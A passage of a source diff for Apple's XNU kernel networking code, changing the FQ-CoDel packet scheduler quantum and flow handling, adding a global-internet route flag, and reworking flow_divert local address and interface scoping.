fq_if_purge_flow(fq_if_t *fqs, fq_t *fq, u_int32_t *pktsp, if (fq->fq_flags & FQF_NEW_FLOW) { fq_if_empty_new_flow(fq, fq_cl, false); } else if (fq->fq_flags & FQF_OLD_FLOW) { - fq_if_empty_old_flow(fqs, fq_cl, fq, false); + fq_if_empty_old_flow(fqs, fq_cl, fq, false, true); } - fq_if_destroy_flow(fqs, fq_cl, fq); + fq_if_destroy_flow(fqs, fq_cl, fq, true); if (FQ_IF_CLASSQ_IDLE(fq_cl)) { int i; @@ -663,6 +756,78 @@ fq_if_purge_sc(fq_if_t *fqs, cqrq_purge_sc_t *req) } } +static uint16_t +fq_if_calc_quantum(struct ifnet *ifp) +{ + uint16_t quantum; + + switch (ifp->if_family) { + case IFNET_FAMILY_ETHERNET: + VERIFY((ifp->if_mtu + ETHER_HDR_LEN) <= UINT16_MAX); + quantum = (uint16_t)ifp->if_mtu + ETHER_HDR_LEN; + break; + + case IFNET_FAMILY_CELLULAR: + case IFNET_FAMILY_IPSEC: + case IFNET_FAMILY_UTUN: + VERIFY(ifp->if_mtu <= UINT16_MAX); + quantum = (uint16_t)ifp->if_mtu; + break; + + default: + quantum = FQ_CODEL_DEFAULT_QUANTUM; + break; + } + + /* + * XXX: Skywalk native interface doesn't support HW TSO offload. + */ + if (((ifp->if_eflags & IFEF_SKYWALK_NATIVE) == 0) && + ((ifp->if_hwassist & IFNET_TSOF) != 0)) { + VERIFY(ifp->if_tso_v4_mtu <= UINT16_MAX); + VERIFY(ifp->if_tso_v6_mtu <= UINT16_MAX); + quantum = (uint16_t)MAX(ifp->if_tso_v4_mtu, ifp->if_tso_v6_mtu); + quantum = (quantum != 0) ? quantum : IF_MAXMTU; + } + + quantum = MAX(FQ_CODEL_DEFAULT_QUANTUM, quantum); +#if DEBUG || DEVELOPMENT + quantum = (fq_codel_quantum != 0) ? fq_codel_quantum : quantum; +#endif /* DEBUG || DEVELOPMENT */ + return quantum; +} + +static void +fq_if_mtu_update(fq_if_t *fqs) +{ +#define _FQ_CLASSQ_UPDATE_QUANTUM(_fqs, _s, _q) \ + (_fqs)->fqs_classq[FQ_IF_ ## _s ## _INDEX].fcl_quantum = \ + FQ_CODEL_QUANTUM_ ## _s(_q) + + uint16_t quantum; + + quantum = fq_if_calc_quantum(fqs->fqs_ifq->ifcq_ifp); + + if ((fqs->fqs_flags & FQS_DRIVER_MANAGED) != 0) { + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BK, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BE, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, VI, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, VO, quantum); + } else { + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BK_SYS, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BK, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BE, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, RD, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, OAM, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, AV, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, RV, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, VI, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, VO, quantum); + _FQ_CLASSQ_UPDATE_QUANTUM(fqs, CTL, quantum); + } +#undef _FQ_CLASSQ_UPDATE_QUANTUM +} + static void fq_if_event(fq_if_t *fqs, cqev_t ev) { @@ -673,6 +838,9 @@ fq_if_event(fq_if_t *fqs, cqev_t ev) case CLASSQ_EV_LINK_DOWN: fq_if_purge(fqs); break; + case CLASSQ_EV_LINK_MTU: + fq_if_mtu_update(fqs); + break; default: break; } @@ -782,8 +950,14 @@ fq_if_setup_ifclassq(struct ifclassq *ifq, u_int32_t flags, classq_pkt_type_t ptype) { #pragma unused(flags) +#define _FQ_CLASSQ_INIT(_fqs, _s, _q) \ + fq_if_classq_init((_fqs), FQ_IF_ ## _s ## _INDEX, \ + FQ_CODEL_QUANTUM_ ## _s(_q), FQ_CODEL_DRR_MAX_ ## _s, \ + MBUF_SC_ ## _s ) + struct ifnet *ifp = ifq->ifcq_ifp; fq_if_t *fqs = NULL; + uint16_t quantum; int err = 0; IFCQ_LOCK_ASSERT_HELD(ifq); @@ -795,51 +969,39 @@ fq_if_setup_ifclassq(struct ifclassq *ifq, u_int32_t flags, return ENOMEM; } + quantum = fq_if_calc_quantum(ifp); + if (flags & PKTSCHEDF_QALG_DRIVER_MANAGED) { fqs->fqs_flags |= FQS_DRIVER_MANAGED; - fq_if_classq_init(fqs, FQ_IF_BK_INDEX, 1500, - 2, MBUF_SC_BK); - fq_if_classq_init(fqs, FQ_IF_BE_INDEX, 1500, - 4, MBUF_SC_BE); - fq_if_classq_init(fqs, FQ_IF_VI_INDEX, 3000, - 6, MBUF_SC_VI); - fq_if_classq_init(fqs, FQ_IF_VO_INDEX, 600, - 8, MBUF_SC_VO); + _FQ_CLASSQ_INIT(fqs, BK, quantum); + _FQ_CLASSQ_INIT(fqs, BE, quantum); + _FQ_CLASSQ_INIT(fqs, VI, quantum); + _FQ_CLASSQ_INIT(fqs, VO, quantum); } else { /* SIG shares same INDEX with VI */ _CASSERT(SCIDX_SIG == SCIDX_VI); _CASSERT(FQ_IF_SIG_INDEX == FQ_IF_VI_INDEX); - fq_if_classq_init(fqs, FQ_IF_BK_SYS_INDEX, 1500, - 2, MBUF_SC_BK_SYS); - fq_if_classq_init(fqs, FQ_IF_BK_INDEX, 1500, - 2, MBUF_SC_BK); - fq_if_classq_init(fqs, FQ_IF_BE_INDEX, 1500, - 4, MBUF_SC_BE); - fq_if_classq_init(fqs, FQ_IF_RD_INDEX, 1500, - 4, MBUF_SC_RD); - fq_if_classq_init(fqs, FQ_IF_OAM_INDEX, 1500, - 4, MBUF_SC_OAM); - fq_if_classq_init(fqs, FQ_IF_AV_INDEX, 3000, - 6, MBUF_SC_AV); - fq_if_classq_init(fqs, FQ_IF_RV_INDEX, 3000, - 6, MBUF_SC_RV); - fq_if_classq_init(fqs, FQ_IF_VI_INDEX, 3000, - 6, MBUF_SC_VI); - fq_if_classq_init(fqs, FQ_IF_VO_INDEX, 600, - 8, MBUF_SC_VO); - fq_if_classq_init(fqs, FQ_IF_CTL_INDEX, 600, - 8, MBUF_SC_CTL); + _FQ_CLASSQ_INIT(fqs, BK_SYS, quantum); + _FQ_CLASSQ_INIT(fqs, BK, quantum); + _FQ_CLASSQ_INIT(fqs, BE, quantum); + _FQ_CLASSQ_INIT(fqs, RD, quantum); + _FQ_CLASSQ_INIT(fqs, OAM, quantum); + _FQ_CLASSQ_INIT(fqs, AV, quantum); + _FQ_CLASSQ_INIT(fqs, RV, quantum); + _FQ_CLASSQ_INIT(fqs, VI, quantum); + _FQ_CLASSQ_INIT(fqs, VO, quantum); + _FQ_CLASSQ_INIT(fqs, CTL, quantum); } err = ifclassq_attach(ifq, PKTSCHEDT_FQ_CODEL, fqs); - if (err != 0) { - printf("%s: error from ifclassq_attach, " + os_log_error(OS_LOG_DEFAULT, "%s: error from ifclassq_attach, " "failed to attach fq_if: %d\n", __func__, err); fq_if_destroy(fqs); } return err; +#undef _FQ_CLASSQ_INIT } fq_t * @@ -893,7 +1055,8 @@ fq_if_hash_pkt(fq_if_t *fqs, u_int32_t flowid, mbuf_svc_class_t svc_class, } void -fq_if_destroy_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq) +fq_if_destroy_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq, + bool destroy_now) { u_int8_t hash_id; hash_id = FQ_IF_FLOW_HASH_ID(fq->fq_flowhash); @@ -901,7 +1064,10 @@ fq_if_destroy_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq) fq_hashlink); fq_cl->fcl_stat.fcl_flows_cnt--; IFCQ_CONVERT_LOCK(fqs->fqs_ifq); - fq_destroy(fq); + fq->fq_flags |= FQF_DESTROYED; + if (destroy_now) { + fq_destroy(fq); + } } inline boolean_t @@ -913,7 +1079,7 @@ fq_if_at_drop_limit(fq_if_t *fqs) static void fq_if_empty_old_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq, - bool remove_hash) + bool remove_hash, bool destroy) { /* * Remove the flow queue if it is empty @@ -927,7 +1093,7 @@ fq_if_empty_old_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq, if (remove_hash) { /* Remove from the hash list */ - fq_if_destroy_flow(fqs, fq_cl, fq); + fq_if_destroy_flow(fqs, fq_cl, fq, destroy); } } @@ -986,7 +1152,7 @@ fq_if_drop_packet(fq_if_t *fqs) if (fq_empty(fq)) { fqs->fqs_large_flow = NULL; if (fq->fq_flags & FQF_OLD_FLOW) { - fq_if_empty_old_flow(fqs, fq_cl, fq, true); + fq_if_empty_old_flow(fqs, fq_cl, fq, true, true); } else { VERIFY(fq->fq_flags & FQF_NEW_FLOW); fq_if_empty_new_flow(fq, fq_cl, true); @@ -1024,14 +1190,21 @@ fq_if_is_flow_heavy(fq_if_t *fqs, fq_t *fq) } boolean_t -fq_if_add_fcentry(fq_if_t *fqs, pktsched_pkt_t *pkt, uint32_t flowid, - uint8_t flowsrc, fq_if_classq_t *fq_cl) +fq_if_add_fcentry(fq_if_t *fqs, pktsched_pkt_t *pkt, uint8_t flowsrc, + fq_t *fq, fq_if_classq_t *fq_cl) { struct flowadv_fcentry *fce; +#if DEBUG || DEVELOPMENT + if (__improbable(ifclassq_flow_control_adv == 0)) { + os_log(OS_LOG_DEFAULT, "%s: skipped flow control", __func__); + return TRUE; + } +#endif /* DEBUG || DEVELOPMENT */ + STAILQ_FOREACH(fce, &fqs->fqs_fclist, fce_link) { if ((uint8_t)fce->fce_flowsrc_type == flowsrc && - fce->fce_flowid == flowid) { + fce->fce_flowid == fq->fq_flowhash) { /* Already on flowcontrol list */ return TRUE; } @@ -1042,6 +1215,11 @@ fq_if_add_fcentry(fq_if_t *fqs, pktsched_pkt_t *pkt, uint32_t flowid, /* XXX Add number of bytes in the queue */ STAILQ_INSERT_TAIL(&fqs->fqs_fclist, fce, fce_link); fq_cl->fcl_stat.fcl_flow_control++; + os_log(OS_LOG_DEFAULT, "%s: num: %d, scidx: %d, flowsrc: %d, " + "flow: 0x%x, iface: %s\n", __func__, + fq_cl->fcl_stat.fcl_flow_control, + fq->fq_sc_index, fce->fce_flowsrc_type, fq->fq_flowhash, + if_name(fqs->fqs_ifq->ifcq_ifp)); } return (fce != NULL) ? TRUE : FALSE; } @@ -1061,23 +1239,30 @@ fq_if_flow_feedback(fq_if_t *fqs, fq_t *fq, fq_if_classq_t *fq_cl) STAILQ_REMOVE(&fqs->fqs_fclist, fce, flowadv_fcentry, fce_link); STAILQ_NEXT(fce, fce_link) = NULL; - flowadv_add_entry(fce); fq_cl->fcl_stat.fcl_flow_feedback++; + os_log(OS_LOG_DEFAULT, "%s: num: %d, scidx: %d, flowsrc: %d, " + "flow: 0x%x, iface: %s\n", __func__, + fq_cl->fcl_stat.fcl_flow_feedback, fq->fq_sc_index, + fce->fce_flowsrc_type, fce->fce_flowid, + if_name(fqs->fqs_ifq->ifcq_ifp)); + flowadv_add_entry(fce); } fq->fq_flags &= ~FQF_FLOWCTL_ON; } void fq_if_dequeue(fq_if_t *fqs, fq_if_classq_t *fq_cl, uint32_t pktlimit, - int64_t bytelimit, classq_pkt_t *top, classq_pkt_t *tail, - uint32_t *retpktcnt, uint32_t *retbytecnt, boolean_t drvmgmt) + int64_t bytelimit, classq_pkt_t *top, classq_pkt_t *bottom, + uint32_t *retpktcnt, uint32_t *retbytecnt, flowq_dqlist_t *fq_dqlist, + boolean_t drvmgmt) { fq_t *fq = NULL, *tfq = NULL; flowq_stailq_t temp_stailq; - u_int32_t pktcnt, bytecnt; + uint32_t pktcnt, bytecnt; boolean_t qempty, limit_reached = FALSE; classq_pkt_t last = CLASSQ_PKT_INITIALIZER(last); fq_getq_flow_t fq_getq_flow_fn; + classq_pkt_t *head, *tail; switch (fqs->fqs_ptype) { case QP_MBUF: @@ -1107,8 +1292,20 @@ fq_if_dequeue(fq_if_t *fqs, fq_if_classq_t *fq_cl, uint32_t pktlimit, ASSERT((fq->fq_flags & (FQF_NEW_FLOW | FQF_OLD_FLOW)) == FQF_NEW_FLOW); + if (fq_dqlist != NULL) { + if (!fq->fq_in_dqlist) { + fq_dqlist_add(fq_dqlist, fq); + } + head = &fq->fq_dq_head; + tail = &fq->fq_dq_tail; + } else { + ASSERT(!fq->fq_in_dqlist); + head = top; + tail = &last; + } + limit_reached = fq_getq_flow_fn(fqs, fq_cl, fq, bytelimit, - pktlimit, top, &last, &bytecnt, &pktcnt, &qempty, + pktlimit, head, tail, &bytecnt, &pktcnt, &qempty, PKTF_NEW_FLOW); if (fq->fq_deficit <= 0 || qempty) { @@ -1123,12 +1320,26 @@ fq_if_dequeue(fq_if_t *fqs, fq_if_classq_t *fq_cl, uint32_t pktlimit, STAILQ_FOREACH_SAFE(fq, &fq_cl->fcl_old_flows, fq_actlink, tfq) { VERIFY((fq->fq_flags & (FQF_NEW_FLOW | FQF_OLD_FLOW)) == FQF_OLD_FLOW); + bool destroy = true; + + if (fq_dqlist != NULL) { + if (!fq->fq_in_dqlist) { + fq_dqlist_add(fq_dqlist, fq); + } + head = &fq->fq_dq_head; + tail = &fq->fq_dq_tail; + destroy = false; + } else { + ASSERT(!fq->fq_in_dqlist); + head = top; + tail = &last; + } limit_reached = fq_getq_flow_fn(fqs, fq_cl, fq, bytelimit, - pktlimit, top, &last, &bytecnt, &pktcnt, &qempty, 0); + pktlimit, head, tail, &bytecnt, &pktcnt, &qempty, 0); if (qempty) { - fq_if_empty_old_flow(fqs, fq_cl, fq, true); + fq_if_empty_old_flow(fqs, fq_cl, fq, true, destroy); } else if (fq->fq_deficit <= 0) { STAILQ_REMOVE(&fq_cl->fcl_old_flows, fq, flowq, fq_actlink); @@ -1151,19 +1362,18 @@ done: } else if (!STAILQ_EMPTY(&temp_stailq)) { fq_cl->fcl_old_flows = temp_stailq; } - if (last.cp_mbuf != NULL) { VERIFY(top->cp_mbuf != NULL); - if (tail != NULL) { - *tail = last; - } - if (retpktcnt != NULL) { - *retpktcnt = pktcnt; - } - if (retbytecnt != NULL) { - *retbytecnt = bytecnt; + if (bottom != NULL) { + *bottom = last; } } + if (retpktcnt != NULL) { + *retpktcnt = pktcnt; + } + if (retbytecnt != NULL) { + *retbytecnt = bytecnt; + } } void diff --git a/bsd/net/pktsched/pktsched_fq_codel.h b/bsd/net/pktsched/pktsched_fq_codel.h index ce05193bc..4228b6e80 100644 --- a/bsd/net/pktsched/pktsched_fq_codel.h +++ b/bsd/net/pktsched/pktsched_fq_codel.h @@ -212,8 +212,8 @@ extern struct flowq *fq_if_hash_pkt(fq_if_t *, u_int32_t, mbuf_svc_class_t, extern boolean_t fq_if_at_drop_limit(fq_if_t *); extern void fq_if_drop_packet(fq_if_t *); extern void fq_if_is_flow_heavy(fq_if_t *, struct flowq *); -extern boolean_t fq_if_add_fcentry(fq_if_t *, pktsched_pkt_t *, uint32_t, - uint8_t, fq_if_classq_t *); +extern boolean_t fq_if_add_fcentry(fq_if_t *, pktsched_pkt_t *, uint8_t, + struct flowq *, fq_if_classq_t *); extern void fq_if_flow_feedback(fq_if_t *, struct flowq *, fq_if_classq_t *); extern int fq_if_setup_ifclassq(struct ifclassq *ifq, u_int32_t flags, classq_pkt_type_t ptype); @@ -221,7 +221,7 @@ extern void fq_if_teardown_ifclassq(struct ifclassq *ifq); extern int fq_if_getqstats_ifclassq(struct ifclassq *ifq, u_int32_t qid, struct if_ifclassq_stats *ifqs); extern void fq_if_destroy_flow(fq_if_t *, fq_if_classq_t *, - struct flowq *); + struct flowq *, bool); #endif /* BSD_KERNEL_PRIVATE */ diff --git a/bsd/net/radix.c b/bsd/net/radix.c index c9ea3960c..a9745cb42 100644 --- a/bsd/net/radix.c +++ b/bsd/net/radix.c @@ -95,9 +95,6 @@ static char normal_chars[] = {0, 0x80, 0xc0, 0xe0, 0xf0, 0xf8, 0xfc, 0xfe, -1}; static char *rn_zeros, *rn_ones; -extern lck_grp_t *domain_proto_mtx_grp; -extern lck_attr_t *domain_proto_mtx_attr; - #define rn_masktop (mask_rnhead->rnh_treetop) #undef Bcmp #define Bcmp(a, b, l) \ diff --git a/bsd/net/route.c b/bsd/net/route.c index a31e25bb6..91000a4ee 100644 --- a/bsd/net/route.c +++ b/bsd/net/route.c @@ -1847,6 +1847,14 @@ rtrequest_common_locked(int req, struct sockaddr *dst0, int, flags, unsigned int, ifscope); LCK_MTX_ASSERT(rnh_lock, LCK_MTX_ASSERT_OWNED); + +#if !(DEVELOPMENT || DEBUG) + /* + * Setting the global internet flag external is only for testing + */ + flags &= ~RTF_GLOBAL; +#endif /* !(DEVELOPMENT || DEBUG) */ + /* * Find the correct routing tree to use for this Address Family */ @@ -2342,6 +2350,16 @@ makeroute: * necp client watchers to re-evaluate */ if (SA_DEFAULT(rt_key(rt))) { + /* + * Mark default routes as (potentially) leading to the global internet + * this can be used for policy decisions. + * The clone routes will inherit this flag. + * We check against the host flag as this works for default routes that have + * a gateway and defaults routes when all subnets are local. + */ + if (req == RTM_ADD && (rt->rt_flags & RTF_HOST) == 0) { + rt->rt_flags |= RTF_GLOBAL; + } if (rt->rt_ifp != NULL) { ifnet_touch_lastupdown(rt->rt_ifp); } diff --git a/bsd/net/route.h b/bsd/net/route.h index 613d61709..42cec6fab 100644 --- a/bsd/net/route.h +++ b/bsd/net/route.h @@ -314,7 +314,8 @@ extern int route_op_entitlement_check(struct socket *, kauth_cred_t, int, boolea #define RTF_PROXY 0x8000000 /* proxying, no interface scope */ #define RTF_ROUTER 0x10000000 /* host is a router */ #define RTF_DEAD 0x20000000 /* Route entry is being freed */ - /* 0x40000000 and up unassigned */ +#define RTF_GLOBAL 0x40000000 /* route to destination of the global internet */ + /* 0x80000000 unassigned */ #define RTPRF_OURS RTF_PROTO3 /* set on routes we manage */ #define RTF_BITS \ @@ -322,7 +323,7 @@ extern int route_op_entitlement_check(struct socket *, kauth_cred_t, int, boolea "\10DELCLONE\11CLONING\12XRESOLVE\13LLINFO\14STATIC\15BLACKHOLE" \ "\16NOIFREF\17PROTO2\20PROTO1\21PRCLONING\22WASCLONED\23PROTO3" \ "\25PINNED\26LOCAL\27BROADCAST\30MULTICAST\31IFSCOPE\32CONDEMNED" \ - "\33IFREF\34PROXY\35ROUTER" + "\33IFREF\34PROXY\35ROUTER\37GLOBAL" #define IS_DIRECT_HOSTROUTE(rt) \ (((rt)->rt_flags & (RTF_HOST | RTF_GATEWAY)) == RTF_HOST) diff --git a/bsd/net/skywalk_stubs.c b/bsd/net/skywalk_stubs.c index f984a3e88..cfeb61b53 100644 --- a/bsd/net/skywalk_stubs.c +++ b/bsd/net/skywalk_stubs.c @@ -156,6 +156,10 @@ STUB(kern_packet_append); STUB(kern_packet_get_next); STUB(kern_packet_set_chain_counts); STUB(kern_packet_get_chain_counts); +STUB(kern_packet_trace_start); +STUB(kern_packet_trace_end); +STUB(kern_packet_is_traced); +STUB(kern_packet_trace_event); STUB(kern_pbufpool_alloc); STUB(kern_pbufpool_alloc_batch); STUB(kern_pbufpool_alloc_batch_callback); diff --git a/bsd/netinet/cpu_in_cksum_gen.c b/bsd/netinet/cpu_in_cksum_gen.c index 2cdb63596..e1cdf126e 100644 --- a/bsd/netinet/cpu_in_cksum_gen.c +++ b/bsd/netinet/cpu_in_cksum_gen.c @@ -108,27 +108,45 @@ uint32_t os_cpu_in_cksum(const void *data, uint32_t len, uint32_t initial_sum) { /* - * If data is 4-bytes aligned, length is multiple of 4-bytes, - * and the amount to checksum is small, this would be quicker; - * this is suitable for IPv4 header. + * If data is 4-bytes aligned (conditional), length is multiple + * of 4-bytes (required), and the amount to checksum is small, + * this would be quicker; this is suitable for IPv4/TCP header. */ - if (IS_P2ALIGNED(data, sizeof(uint32_t)) && - len <= 64 && (len & 3) == 0) { + if ( +#if !defined(__arm64__) && !defined(__x86_64__) + IS_P2ALIGNED(data, sizeof(uint32_t)) && +#endif /* !__arm64__ && !__x86_64__ */ + len <= 64 && (len & 3) == 0) { uint8_t *p = __DECONST(uint8_t *, data); uint64_t sum = initial_sum; - if (PREDICT_TRUE(len == 20)) { /* simple IPv4 header */ + switch (len) { + case 20: /* simple IPv4 or TCP header */ sum += *(uint32_t *)(void *)p; sum += *(uint32_t *)(void *)(p + 4); sum += *(uint32_t *)(void *)(p + 8); sum += *(uint32_t *)(void *)(p + 12); sum += *(uint32_t *)(void *)(p + 16); - } else { + break; + + case 32: /* TCP header + timestamp option */ + sum += *(uint32_t *)(void *)p; + sum += *(uint32_t *)(void *)(p + 4); + sum += *(uint32_t *)(void *)(p + 8); + sum += *(uint32_t *)(void *)(p + 12); + sum += *(uint32_t *)(void *)(p + 16); + sum += *(uint32_t *)(void *)(p + 20); + sum += *(uint32_t *)(void *)(p + 24); + sum += *(uint32_t *)(void *)(p + 28); + break; + + default: while (len) { sum += *(uint32_t *)(void *)p; p += 4; len -= 4; } + break; } /* fold 64-bit to 16-bit (deferred carries) */ diff --git a/bsd/netinet/flow_divert.c b/bsd/netinet/flow_divert.c index e278115c2..818eb1bea 100644 --- a/bsd/netinet/flow_divert.c +++ b/bsd/netinet/flow_divert.c @@ -1,5 +1,5 @@ /* - * Copyright (c) 2012-2017, 2020 Apple Inc. All rights reserved. + * Copyright (c) 2012-2017, 2020, 2021 Apple Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -80,6 +80,8 @@ #define FLOW_DIVERT_NOTIFY_ON_RECEIVED 0x00000080 #define FLOW_DIVERT_IMPLICIT_CONNECT 0x00000100 #define FLOW_DIVERT_DID_SET_LOCAL_ADDR 0x00000200 +#define FLOW_DIVERT_HAS_TOKEN 0x00000400 +#define FLOW_DIVERT_SHOULD_SET_LOCAL_ADDR 0x00000800 #define FDLOG(level, pcb, format, ...) \ os_log_with_type(OS_LOG_DEFAULT, flow_divert_syslog_type_to_oslog_type(level), "(%u): " format "\n", (pcb)->hash, __VA_ARGS__) @@ -1374,6 +1376,13 @@ flow_divert_send_connect_result(struct flow_divert_pcb *fd_cb) goto done; } + if (fd_cb->local_endpoint.sa.sa_family == AF_INET || fd_cb->local_endpoint.sa.sa_family == AF_INET6) { + error = flow_divert_packet_append_tlv(packet, FLOW_DIVERT_TLV_LOCAL_ADDR, fd_cb->local_endpoint.sa.sa_len, &(fd_cb->local_endpoint.sa)); + if (error) { + goto done; + } + } + error = flow_divert_send_packet(fd_cb, packet, TRUE); if (error) { goto done; @@ -1812,12 +1821,12 @@ done: } static void -flow_divert_set_local_endpoint(struct flow_divert_pcb *fd_cb, struct sockaddr *local_endpoint, bool port_only) +flow_divert_set_local_endpoint(struct flow_divert_pcb *fd_cb, struct sockaddr *local_endpoint) { struct inpcb *inp = sotoinpcb(fd_cb->so); if (local_endpoint->sa_family == AF_INET6) { - if (IN6_IS_ADDR_UNSPECIFIED(&inp->in6p_laddr) && !port_only) { + if (IN6_IS_ADDR_UNSPECIFIED(&inp->in6p_laddr) && (fd_cb->flags & FLOW_DIVERT_SHOULD_SET_LOCAL_ADDR)) { fd_cb->flags |= FLOW_DIVERT_DID_SET_LOCAL_ADDR; inp->in6p_laddr = (satosin6(local_endpoint))->sin6_addr; } @@ -1825,7 +1834,7 @@ flow_divert_set_local_endpoint(struct flow_divert_pcb *fd_cb, struct sockaddr *l inp->inp_lport = (satosin6(local_endpoint))->sin6_port; } } else if (local_endpoint->sa_family == AF_INET) { - if (inp->inp_laddr.s_addr == INADDR_ANY && !port_only) { + if (inp->inp_laddr.s_addr == INADDR_ANY && (fd_cb->flags & FLOW_DIVERT_SHOULD_SET_LOCAL_ADDR)) { fd_cb->flags |= FLOW_DIVERT_DID_SET_LOCAL_ADDR; inp->inp_laddr = (satosin(local_endpoint))->sin_addr; } @@ -2032,8 +2041,10 @@ flow_divert_disable(struct flow_divert_pcb *fd_cb) NULL, (last_proc != NULL ? last_proc : current_proc())); - if (error) { + if (error && error != EWOULDBLOCK) { FDLOG(LOG_ERR, fd_cb, "Failed to send queued data using the socket's original protocol: %d", error); + } else { + error = 0; } } else if (SOCK_TYPE(so) == SOCK_DGRAM) { struct sockbuf *sb = &so->so_snd; @@ -2134,6 +2145,78 @@ done: } } +static void +flow_divert_scope(struct flow_divert_pcb *fd_cb, int out_if_index, bool derive_new_address) +{ + struct socket *so = NULL; + struct inpcb *inp = NULL; + struct ifnet *current_ifp = NULL; + struct ifnet *new_ifp = NULL; + int error = 0; + + so = fd_cb->so; + if (so == NULL) { + return; + } + + inp = sotoinpcb(so); + + if (out_if_index <= 0) { + return; + } + + if (inp->inp_vflag & INP_IPV6) { + current_ifp = inp->in6p_last_outifp; + } else { + current_ifp = inp->inp_last_outifp; + } + + if (current_ifp != NULL) { + if (current_ifp->if_index == out_if_index) { + /* No change */ + return; + } + + /* Scope the socket to the given interface */ + error = inp_bindif(inp, out_if_index, &new_ifp); + if (error != 0) { + FDLOG(LOG_ERR, fd_cb, "failed to scope to %d because inp_bindif returned %d", out_if_index, error); + return; + } + + if (derive_new_address && fd_cb->original_remote_endpoint != NULL) { + /* Get the appropriate address for the given interface */ + if (inp->inp_vflag & INP_IPV6) { + inp->in6p_laddr = sa6_any.sin6_addr; + error = in6_pcbladdr(inp, fd_cb->original_remote_endpoint, &(fd_cb->local_endpoint.sin6.sin6_addr), NULL); + } else { + inp->inp_laddr.s_addr = INADDR_ANY; + error = in_pcbladdr(inp, fd_cb->original_remote_endpoint, &(fd_cb->local_endpoint.sin.sin_addr), IFSCOPE_NONE, NULL, 0); + } + + if (error != 0) { + FDLOG(LOG_WARNING, fd_cb, "failed to derive a new local address from %d because in_pcbladdr returned %d", out_if_index, error); + } + } + } else { + ifnet_head_lock_shared(); + if (out_if_index <= if_index) { + new_ifp = ifindex2ifnet[out_if_index]; + } + ifnet_head_done(); + } + + /* Update the "last interface" of the socket */ + if (new_ifp != NULL) { + if (inp->inp_vflag & INP_IPV6) { + inp->in6p_last_outifp = new_ifp; + } else { + inp->inp_last_outifp = new_ifp; + } + + } +} + static void flow_divert_handle_connect_result(struct flow_divert_pcb *fd_cb, mbuf_t packet, int offset) { @@ -2213,12 +2296,17 @@ flow_divert_handle_connect_result(struct flow_divert_pcb *fd_cb, mbuf_t packet, FDLOCK(fd_cb); if (fd_cb->so != NULL) { struct inpcb *inp = NULL; - struct ifnet *ifp = NULL; struct flow_divert_group *old_group; struct socket *so = fd_cb->so; + bool local_address_is_valid = false; socket_lock(so, 0); + if (!(so->so_flags & SOF_FLOW_DIVERT)) { + FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring connect result"); + goto done; + } + if (SOCK_TYPE(so) == SOCK_STREAM && !(so->so_state & SS_ISCONNECTING)) { FDLOG0(LOG_ERR, fd_cb, "TCP socket is not in the connecting state, ignoring connect result"); goto done; @@ -2233,13 +2321,28 @@ flow_divert_handle_connect_result(struct flow_divert_pcb *fd_cb, mbuf_t packet, if (flow_divert_is_sockaddr_valid(&(local_endpoint.sa))) { if (local_endpoint.sa.sa_family == AF_INET) { local_endpoint.sa.sa_len = sizeof(struct sockaddr_in); + if ((inp->inp_vflag & INP_IPV4) && local_endpoint.sin.sin_addr.s_addr != INADDR_ANY) { + local_address_is_valid = true; + fd_cb->local_endpoint = local_endpoint; + inp->inp_laddr.s_addr = INADDR_ANY; + } else { + fd_cb->local_endpoint.sin.sin_port = local_endpoint.sin.sin_port; + } } else if (local_endpoint.sa.sa_family == AF_INET6) { local_endpoint.sa.sa_len = sizeof(struct sockaddr_in6); + if ((inp->inp_vflag & INP_IPV6) && !IN6_IS_ADDR_UNSPECIFIED(&local_endpoint.sin6.sin6_addr)) { + local_address_is_valid = true; + fd_cb->local_endpoint = local_endpoint; + inp->in6p_laddr = sa6_any.sin6_addr; + } else { + fd_cb->local_endpoint.sin6.sin6_port = local_endpoint.sin6.sin6_port; + } } - fd_cb->local_endpoint = local_endpoint; - flow_divert_set_local_endpoint(fd_cb, &(local_endpoint.sa), (SOCK_TYPE(so) == SOCK_DGRAM)); } + flow_divert_scope(fd_cb, out_if_index, !local_address_is_valid); + flow_divert_set_local_endpoint(fd_cb, &(fd_cb->local_endpoint.sa)); + if (flow_divert_is_sockaddr_valid(&(remote_endpoint.sa)) && SOCK_TYPE(so) == SOCK_STREAM) { if (remote_endpoint.sa.sa_family == AF_INET) { remote_endpoint.sa.sa_len = sizeof(struct sockaddr_in); @@ -2270,22 +2373,6 @@ flow_divert_handle_connect_result(struct flow_divert_pcb *fd_cb, mbuf_t packet, } } - ifnet_head_lock_shared(); - if (out_if_index > 0 && out_if_index <= if_index) { - ifp = ifindex2ifnet[out_if_index]; - } - - if (ifp != NULL) { - if (inp->inp_vflag & INP_IPV4) { - inp->inp_last_outifp = ifp; - } else if (inp->inp_vflag & INP_IPV6) { - inp->in6p_last_outifp = ifp; - } - } else { - error = EINVAL; - } - ifnet_head_done(); - if (error) { goto set_socket_state; } @@ -2398,6 +2485,11 @@ flow_divert_handle_close(struct flow_divert_pcb *fd_cb, mbuf_t packet, int offse if (fd_cb->so != NULL) { socket_lock(fd_cb->so, 0); + if (!(fd_cb->so->so_flags & SOF_FLOW_DIVERT)) { + FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring close from provider"); + goto done; + } + fd_cb->so->so_error = (uint16_t)ntohl(close_error); flow_divert_update_closed_state(fd_cb, how, TRUE); @@ -2410,7 +2502,7 